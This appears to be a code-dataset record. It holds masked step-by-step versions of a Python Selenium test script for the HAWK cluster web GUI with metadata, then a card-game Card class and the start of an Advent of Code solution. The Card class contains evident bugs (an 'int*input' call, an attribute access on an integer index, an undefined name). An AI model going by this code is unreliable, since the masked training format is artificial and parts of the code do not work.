ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
if args.prefix and not re.match('^\\w+$', args.prefix.lower()):
print('ERROR: Prefix must contain only numbers and letters. Ignoring')
args.prefix = ''
<|reserved_special_token_0|>
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'
)
parser.add_argument('-b', '--browser', type=str, required=True, help=
'Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost', help=
'Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630', help=
'TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='', help=
'Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=
True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='', help=
'root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='', help=
'Generate hawk_test.results file')
args = parser.parse_args()
browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args
.port, browser=args.browser.lower(), version=args.test_version.lower())
results = hawk_test_results.resultSet()
if args.secret:
ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
if args.prefix and not re.match('^\\w+$', args.prefix.lower()):
print('ERROR: Prefix must contain only numbers and letters. Ignoring')
args.prefix = ''
mycluster = args.prefix.lower() + 'Anderes'
myprimitive = args.prefix.lower() + 'cool_primitive'
myclone = args.prefix.lower() + 'cool_clone'
mygroup = args.prefix.lower() + 'cool_group'
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results
parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'
)
parser.add_argument('-b', '--browser', type=str, required=True, help=
'Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost', help=
'Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630', help=
'TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='', help=
'Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=
True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='', help=
'root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='', help=
'Generate hawk_test.results file')
args = parser.parse_args()
browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args
.port, browser=args.browser.lower(), version=args.test_version.lower())
results = hawk_test_results.resultSet()
if args.secret:
ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
if args.prefix and not re.match('^\\w+$', args.prefix.lower()):
print('ERROR: Prefix must contain only numbers and letters. Ignoring')
args.prefix = ''
mycluster = args.prefix.lower() + 'Anderes'
myprimitive = args.prefix.lower() + 'cool_primitive'
myclone = args.prefix.lower() + 'cool_clone'
mygroup = args.prefix.lower() + 'cool_group'
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
<|reserved_special_token_1|>
#!/usr/bin/python3
"""HAWK GUI interface Selenium test: tests hawk GUI with Selenium using firefox or chrome."""

import argparse
import re
import sys

import hawk_test_driver
import hawk_test_results
import hawk_test_ssh

### MAIN

# Command line argument parsing
parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')
parser.add_argument('-b', '--browser', type=str, required=True,
                    help='Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost',
                    help='Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630',
                    help='TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='',
                    help='Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, required=True,
                    help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='',
                    help='root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='',
                    help='Generate hawk_test.results file')
args = parser.parse_args()

# Create driver instance
browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,
                                          browser=args.browser.lower(),
                                          version=args.test_version.lower())

# Initialize results set
results = hawk_test_results.resultSet()

# Establish SSH connection to verify status only if SSH password was supplied
if args.secret:
    ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
    results.add_ssh_tests()

# Resources to create; a prefix with non-alphanumeric characters is discarded
if args.prefix and not re.match(r"^\w+$", args.prefix.lower()):
    print("ERROR: Prefix must contain only numbers and letters. Ignoring")
    args.prefix = ''
mycluster = args.prefix.lower() + 'Anderes'
myprimitive = args.prefix.lower() + 'cool_primitive'
myclone = args.prefix.lower() + 'cool_clone'
mygroup = args.prefix.lower() + 'cool_group'

# Tests to perform
browser.test('test_set_stonith_maintenance', results)
if args.secret:
    ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
    ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
    ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
    ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)

# Save results if run with -r or --results
if args.results:
    results.logresults(args.results)

# Exit with the number of failed tests (0 == success). sys.exit() is used
# instead of quit(): quit() is injected by the optional `site` module and is
# not guaranteed to exist when the script runs non-interactively.
sys.exit(results.get_failed_tests_total())
|
flexible
|
{
"blob_id": "874668d5f3ea61b6aabde7b784078b431961a9c9",
"index": 9096,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\n<mask token>\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. 
Ignoring')\n args.prefix = ''\n<mask token>\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. 
Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-4": "<mask token>\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. 
Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-5": "#!/usr/bin/python3\n\"\"\"HAWK GUI interface Selenium test: tests hawk GUI with Selenium using firefox or chrome\"\"\"\n\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\n\n### MAIN\n\n# Command line argument parsing\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')\nparser.add_argument('-b', '--browser', type=str, required=True,\n help='Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost',\n help='Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630',\n help='TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='',\n help='Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=True,\n help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='',\n help='root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='',\n help='Generate hawk_test.results file')\nargs = parser.parse_args()\n\n# Create driver instance\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,\n browser=args.browser.lower(),\n version=args.test_version.lower())\n\n# Initialize results set\nresults = hawk_test_results.resultSet()\n\n# Establish SSH connection to verify status only if SSH password was supplied\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\n\n# Resources to create\nif args.prefix and not re.match(r\"^\\w+$\", args.prefix.lower()):\n print(\"ERROR: Prefix must contain only numbers and letters. 
Ignoring\")\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\n\n# Tests to perform\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\n\n# Save results if run with -r or --results\nif args.results:\n results.logresults(args.results)\n\nquit(results.get_failed_tests_total())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import loops
class Card():
#to make a card you must type Card("Name of Card")
def check_cat(self,string):
if "Cat" in string:
return True
return False
def __init__(self,string):
self.type = string
self.cat = self.check_cat(self.type)
# self.image_back = image_back
# self.image_front = image_front
def __str__(self):
return self.type
#negates any action, except a defuse
def nope(self,arr_players,cards,turn_order):
count = 0
for i,k in enumerate(arr_players):
if i != turn_order:
for i,k in enumerate(k.hand):
if k == cards[11]:
count += 1
if count > 0:
print("A nope card can be played")
decision = input("Would a player like to play a nope card? (y/n)")
while decision != "y" and decision != "n":
decision = input("Would a player like to play a nope card? (y/n) ")
if decision == "n":
return False
elif decision == 'y':
for i,k in enumerate(arr_players):
print(str(i)+"-"+k.name)
player = int(input("Which player would like to play the nope card?"))
while (player < 0 or player > len(arr_players)) and players == turn_order:
player = int*input("Which player would like to play the nope card?")
arr_players[player].hand.remove(cards[11])
return True
return False
#makes another player choose a card to give away to current player
def favor(self,hand,player,arr_players,played_card):
recipient = loops.phase_of_taking(arr_players,player)
card_taken = arr_players[recipient].hand.pop(loops.give_card(arr_players,recipient))
print(card_taken,"was given")
recipient.hand.remove(card_taken)
player.hand.append(card_taken)
return True,False
#allows a player to steal a card from another player
def steal(self,hand,player,arr_players,played_card):
recipient = loops.phase_of_taking(arr_players,player)
card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(arr_players,recipient))
print("You stole",card_stolen.type)
hand.remove(played_card)
player.hand.append(card_stolen)
return True,False
#makes the player skip a turn
def skip(self,attack,pick):
print("Your turn has been skipped")
pick = False
return pick,attack
#the player makes the next person take his turn as well, forcing them to take 2 turns
def attack(self,attack,pick):
attack = True
pick = False
return pick,attack
#see future draws the top three cards, prints the three cards, and puts the cards back in the correct positions
def see_future(self,decker):
if decker.cards_left() < 3:
for i in range(decker.cards_left()):
card = decker.draw_top(i)
print(card.type)
decker.add_card(card,i)
else:
for i in range(3):
card = decker.draw_top(i)
print(card.type)
decker.add_card(card,i)
|
normal
|
{
"blob_id": "3b71ef6c3681b8c5e6aadf2d125c35cbf3a12661",
"index": 6248,
"step-1": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n <mask token>\n\n def __str__(self):\n return self.type\n <mask token>\n\n def favor(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_taken = arr_players[recipient].hand.pop(loops.give_card(\n arr_players, recipient))\n print(card_taken, 'was given')\n recipient.hand.remove(card_taken)\n player.hand.append(card_taken)\n return True, False\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n\n def __init__(self, string):\n self.type = string\n self.cat = self.check_cat(self.type)\n\n def __str__(self):\n return self.type\n\n def nope(self, arr_players, cards, turn_order):\n count = 0\n for i, k in enumerate(arr_players):\n if i != turn_order:\n for i, k in enumerate(k.hand):\n if k == cards[11]:\n count += 1\n if count > 0:\n print('A nope card can be played')\n decision = input('Would a player like to play a nope card? (y/n)')\n while decision != 'y' and decision != 'n':\n decision = input(\n 'Would a player like to play a nope card? (y/n) ')\n if decision == 'n':\n return False\n elif decision == 'y':\n for i, k in enumerate(arr_players):\n print(str(i) + '-' + k.name)\n player = int(input(\n 'Which player would like to play the nope card?'))\n while (player < 0 or player > len(arr_players)\n ) and players == turn_order:\n player = int * input(\n 'Which player would like to play the nope card?')\n arr_players[player].hand.remove(cards[11])\n return True\n return False\n\n def favor(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_taken = arr_players[recipient].hand.pop(loops.give_card(\n arr_players, recipient))\n print(card_taken, 'was given')\n recipient.hand.remove(card_taken)\n player.hand.append(card_taken)\n return True, False\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n <mask token>\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass Card:\n\n def check_cat(self, string):\n if 'Cat' in string:\n return True\n return False\n\n def __init__(self, string):\n self.type = string\n self.cat = self.check_cat(self.type)\n\n def __str__(self):\n return self.type\n\n def nope(self, arr_players, cards, turn_order):\n count = 0\n for i, k in enumerate(arr_players):\n if i != turn_order:\n for i, k in enumerate(k.hand):\n if k == cards[11]:\n count += 1\n if count > 0:\n print('A nope card can be played')\n decision = input('Would a player like to play a nope card? (y/n)')\n while decision != 'y' and decision != 'n':\n decision = input(\n 'Would a player like to play a nope card? (y/n) ')\n if decision == 'n':\n return False\n elif decision == 'y':\n for i, k in enumerate(arr_players):\n print(str(i) + '-' + k.name)\n player = int(input(\n 'Which player would like to play the nope card?'))\n while (player < 0 or player > len(arr_players)\n ) and players == turn_order:\n player = int * input(\n 'Which player would like to play the nope card?')\n arr_players[player].hand.remove(cards[11])\n return True\n return False\n\n def favor(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_taken = arr_players[recipient].hand.pop(loops.give_card(\n arr_players, recipient))\n print(card_taken, 'was given')\n recipient.hand.remove(card_taken)\n player.hand.append(card_taken)\n return True, False\n\n def steal(self, hand, player, arr_players, played_card):\n recipient = loops.phase_of_taking(arr_players, player)\n card_stolen = arr_players[recipient].hand.pop(loops.card_stealing(\n arr_players, recipient))\n print('You stole', card_stolen.type)\n hand.remove(played_card)\n player.hand.append(card_stolen)\n return True, False\n\n def skip(self, attack, pick):\n print('Your turn has been skipped')\n pick = False\n return pick, attack\n\n def attack(self, attack, pick):\n attack = True\n pick = False\n return pick, attack\n\n def 
see_future(self, decker):\n if decker.cards_left() < 3:\n for i in range(decker.cards_left()):\n card = decker.draw_top(i)\n print(card.type)\n decker.add_card(card, i)\n else:\n for i in range(3):\n card = decker.draw_top(i)\n print(card.type)\n decker.add_card(card, i)\n",
"step-5": "import loops\r\n\r\nclass Card():\r\n #to make a card you must type Card(\"Name of Card\")\r\n def check_cat(self,string):\r\n if \"Cat\" in string:\r\n return True\r\n return False\r\n def __init__(self,string):\r\n self.type = string\r\n self.cat = self.check_cat(self.type)\r\n # self.image_back = image_back\r\n # self.image_front = image_front\r\n def __str__(self):\r\n return self.type\r\n #negates any action, except a defuse\r\n def nope(self,arr_players,cards,turn_order):\r\n count = 0\r\n for i,k in enumerate(arr_players):\r\n if i != turn_order:\r\n for i,k in enumerate(k.hand):\r\n if k == cards[11]:\r\n count += 1\r\n if count > 0:\r\n print(\"A nope card can be played\")\r\n decision = input(\"Would a player like to play a nope card? (y/n)\")\r\n while decision != \"y\" and decision != \"n\":\r\n decision = input(\"Would a player like to play a nope card? (y/n) \")\r\n if decision == \"n\":\r\n return False\r\n elif decision == 'y':\r\n for i,k in enumerate(arr_players):\r\n print(str(i)+\"-\"+k.name)\r\n player = int(input(\"Which player would like to play the nope card?\"))\r\n while (player < 0 or player > len(arr_players)) and players == turn_order:\r\n player = int*input(\"Which player would like to play the nope card?\")\r\n arr_players[player].hand.remove(cards[11])\r\n return True\r\n return False\r\n\r\n #makes another player choose a card to give away to current player\r\n def favor(self,hand,player,arr_players,played_card):\r\n recipient = loops.phase_of_taking(arr_players,player)\r\n card_taken = arr_players[recipient].hand.pop(loops.give_card(arr_players,recipient))\r\n print(card_taken,\"was given\")\r\n recipient.hand.remove(card_taken)\r\n player.hand.append(card_taken)\r\n return True,False\r\n #allows a player to steal a card from another player\r\n def steal(self,hand,player,arr_players,played_card):\r\n recipient = loops.phase_of_taking(arr_players,player)\r\n card_stolen = 
arr_players[recipient].hand.pop(loops.card_stealing(arr_players,recipient))\r\n print(\"You stole\",card_stolen.type)\r\n hand.remove(played_card)\r\n player.hand.append(card_stolen)\r\n return True,False\r\n #makes the player skip a turn\r\n def skip(self,attack,pick):\r\n print(\"Your turn has been skipped\")\r\n pick = False\r\n return pick,attack\r\n #the player makes the next person take his turn as well, forcing them to take 2 turns\r\n def attack(self,attack,pick):\r\n attack = True\r\n pick = False\r\n return pick,attack\r\n #see future draws the top three cards, prints the three cards, and puts the cards back in the correct positions\r\n def see_future(self,decker):\r\n if decker.cards_left() < 3:\r\n for i in range(decker.cards_left()):\r\n card = decker.draw_top(i)\r\n print(card.type)\r\n decker.add_card(card,i)\r\n else:\r\n for i in range(3):\r\n card = decker.draw_top(i)\r\n print(card.type)\r\n decker.add_card(card,i) ",
"step-ids": [
4,
6,
8,
10,
12
]
}
|
[
4,
6,
8,
10,
12
] |
# Advent of Code: Day 4
"""A new system policy has been put in place that requires all accounts to
use a passphrase instead of simply a password. A passphrase consists of a
series of words (lowercase letters) separated by spaces.
To ensure security, a valid passphrase must contain no duplicate words.
"""
def valid(filename):
